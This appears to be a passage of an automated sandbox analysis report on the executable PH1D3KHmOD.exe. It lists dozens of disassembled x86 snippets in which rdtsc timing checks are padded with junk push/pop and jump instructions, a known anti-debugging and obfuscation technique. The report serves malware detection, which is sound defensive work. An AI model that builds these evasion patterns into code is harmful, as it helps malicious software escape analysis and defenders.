      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34D78F second address: 34D7AB instructions: 0x00000000 rdtsc 0x00000002 je 00007F8CACB12CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8CACB12CBFh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34D7AB second address: 34D7B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34DA77 second address: 34DA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jno 00007F8CACB12CB6h 0x0000000e pop edi 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34DA86 second address: 34DAAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F8CACC719E6h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8CACC719EDh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34DAAD second address: 34DAB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34DAB1 second address: 34DAC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719EDh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34DAC4 second address: 34DAF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CACB12CC9h 0x00000009 jmp 00007F8CACB12CC3h 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34DAF4 second address: 34DAFE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8CACC719E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34DD7B second address: 34DD88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F8CACB12CB6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34E036 second address: 34E03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34E03E second address: 34E073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F8CACB12CBCh 0x0000000b pop edx 0x0000000c jmp 00007F8CACB12CC7h 0x00000011 popad 0x00000012 ja 00007F8CACB12CC4h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3518C2 second address: 3518C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3518C8 second address: 3518CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3518CC second address: 3518D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3518D0 second address: 3518E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8CACB12CBBh 0x0000000e pop ebx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 351B5F second address: 351B73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 351B73 second address: 351B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8CACB12CC3h 0x0000000f popad 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 351B91 second address: 351BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CACC719EDh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 351BA5 second address: 351BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 351D16 second address: 351D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35E306 second address: 35E33C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8CACB12CB6h 0x00000008 jmp 00007F8CACB12CC4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8CACB12CC5h 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35E33C second address: 35E348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007F8CACC719E6h 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35E8DF second address: 35E8F5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8CACB12CB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 ja 00007F8CACB12CB6h 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35E8F5 second address: 35E927 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8CACC719E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jmp 00007F8CACC719EFh 0x00000017 popad 0x00000018 pushad 0x00000019 push ecx 0x0000001a jmp 00007F8CACC719ECh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35E927 second address: 35E93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F8CACB12CBEh 0x0000000b jnl 00007F8CACB12CB6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35E93E second address: 35E944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35E944 second address: 35E948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35EC0F second address: 35EC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F8CACC719EEh 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35ED79 second address: 35ED85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8CACB12CB6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35ED85 second address: 35EDC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F8CACC719E8h 0x00000012 jmp 00007F8CACC719F4h 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007F8CACC719E6h 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 365796 second address: 36579C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 36579C second address: 3657A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3749DF second address: 3749E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3743DE second address: 374410 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8CACC719E6h 0x00000008 jmp 00007F8CACC719EBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F8CACC719F7h 0x00000015 jmp 00007F8CACC719F1h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 374410 second address: 374423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACB12CBDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 374423 second address: 374428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 374428 second address: 37444B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CC3h 0x00000007 jl 00007F8CACB12CC2h 0x0000000d je 00007F8CACB12CB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 374569 second address: 374581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F8CACC719E6h 0x00000012 js 00007F8CACC719E6h 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 374581 second address: 3745AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CC6h 0x00000007 jmp 00007F8CACB12CC0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3745AB second address: 3745CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8CACC719F8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3745CD second address: 3745D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 37738A second address: 3773BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F8CACC719FAh 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 387FE1 second address: 387FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 387FE5 second address: 38800A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F8CACC719F3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38800A second address: 38801E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jc 00007F8CACB12CBAh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38801E second address: 388022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 388022 second address: 388045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CBFh 0x00000007 jmp 00007F8CACB12CBBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 388045 second address: 38804B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 387E70 second address: 387E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 387E76 second address: 387E8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8CACC719EEh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 387E8E second address: 387EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F8CACB12CBEh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC1B second address: 38FC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8CACC719EEh 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC33 second address: 38FC48 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8CACB12CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F8CACB12CC2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC48 second address: 38FC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC4E second address: 38FC5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007F8CACB12CB6h 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC5A second address: 38FC5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC5E second address: 38FC71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACB12CBDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC71 second address: 38FC77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC77 second address: 38FC7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC7D second address: 38FC81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC81 second address: 38FCA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACB12CC8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FF6A second address: 38FF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8CACC719E6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FF7B second address: 38FF7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FF7F second address: 38FF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FF87 second address: 38FFA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CC0h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F8CACB12CB6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 390447 second address: 39044B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 39044B second address: 390468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CBFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jne 00007F8CACB12CB6h 0x00000012 pop edi 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 390468 second address: 39048A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8CACC719EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F8CACC719EEh 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3905DF second address: 3905E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3905E5 second address: 39061E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACC719F4h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jmp 00007F8CACC719F8h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 39061E second address: 390622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 396D3A second address: 396D44 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8CACC719ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 29F221 second address: 29F24A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CACB12CC4h 0x00000009 jmp 00007F8CACB12CC1h 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 29F24A second address: 29F25F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8CACC719E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007F8CACC719E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 29F25F second address: 29F26C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 29F26C second address: 29F270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 29F270 second address: 29F2A0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8CACB12CB6h 0x00000008 jp 00007F8CACB12CB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jl 00007F8CACB12CB6h 0x00000017 jmp 00007F8CACB12CBCh 0x0000001c jbe 00007F8CACB12CB6h 0x00000022 ja 00007F8CACB12CB6h 0x00000028 popad 0x00000029 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 29F2A0 second address: 29F2A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3A30FA second address: 3A3105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F8CACB12CB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3A5645 second address: 3A564E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3A564E second address: 3A5654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3A5654 second address: 3A565C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3A565C second address: 3A5664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B290B second address: 3B2910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B2910 second address: 3B293B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CACB12CC7h 0x00000009 jmp 00007F8CACB12CC0h 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B293B second address: 3B293F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B4236 second address: 3B423B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B40BC second address: 3B40C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B7E81 second address: 3B7E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B79BF second address: 3B79D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F8CACC719ECh 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B79D3 second address: 3B79D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
